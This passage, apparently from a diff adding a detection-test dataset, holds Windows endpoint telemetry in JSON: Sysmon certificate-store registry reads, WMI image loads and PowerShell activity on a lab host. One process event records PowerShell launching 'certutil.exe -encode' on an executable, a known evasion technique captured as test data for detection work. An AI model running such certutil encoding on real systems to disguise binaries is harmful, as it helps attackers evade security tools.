"C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573489170000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "registry", + "pid": 4036, + "process_name": "wmiprvse.exe", + "process_path": "C:\\WINDOWS\\system32\\wbem\\wmiprvse.exe", + "registry_key": "", + "registry_path": "HKCR", + "registry_value": "HKCR", + "timestamp": 131883573489170000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573489330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573489330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573489330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573489330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573489330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573489330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573489330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573489330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573489330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573489330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573489330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573489330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573489330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573489330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573489330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573489330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573489330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573489330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573489330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573489330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573489330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573489330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573489330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573489330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573489330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573489330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "WmiPerfInst.dll", + "image_path": "C:\\Windows\\System32\\wbem\\WmiPerfInst.dll", + "pid": 4036, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573489330000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573489330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573489330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573489330000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573489490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573489490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573489490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573489490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573489490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573489490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573489490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573489490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573489490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573489490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573489490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573489490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573489490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573489490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573489490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573489490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573489490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573489490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573489490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573489490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573489490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573489490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573489490000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "pdh.dll", + "image_path": "C:\\Windows\\System32\\pdh.dll", + "pid": 4036, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573489330000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "image_load", + "image_name": "perfos.dll", + "image_path": "C:\\Windows\\System32\\perfos.dll", + "pid": 4036, + "process_name": "WmiPrvSE.exe", + "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", + "timestamp": 131883573491520000, + "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" + }, + { + "event_type": "registry", + "pid": 7036, + "process_name": "powershell.exe", + "process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883573494790000, + "unique_pid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}" + }, + { + "event_type": "registry", + "pid": 7036, + "process_name": "powershell.exe", + "process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883573494790000, + "unique_pid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}" + }, + { + "event_type": "registry", + "pid": 7036, + "process_name": "powershell.exe", + "process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883573494950016, + "unique_pid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}" + }, + { + "event_type": "registry", + "pid": 7036, + "process_name": "powershell.exe", + "process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883573494950016, + "unique_pid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}" + }, + { + "event_type": "registry", + "pid": 7036, + "process_name": "powershell.exe", + "process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883573494950016, + "unique_pid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}" + }, + { + "event_type": "registry", + "pid": 7036, + "process_name": "powershell.exe", + "process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", + "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", + "registry_value": "Parameters", + "timestamp": 131883573494950016, + "unique_pid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"certutil.exe -encode c:\\file.exe file.txt\"", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 204, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883573496150000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-0010979B5501}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 204, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573496040000, + "unique_pid": "{42FC7E13-CBE5-5C05-0000-0010979B5501}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", 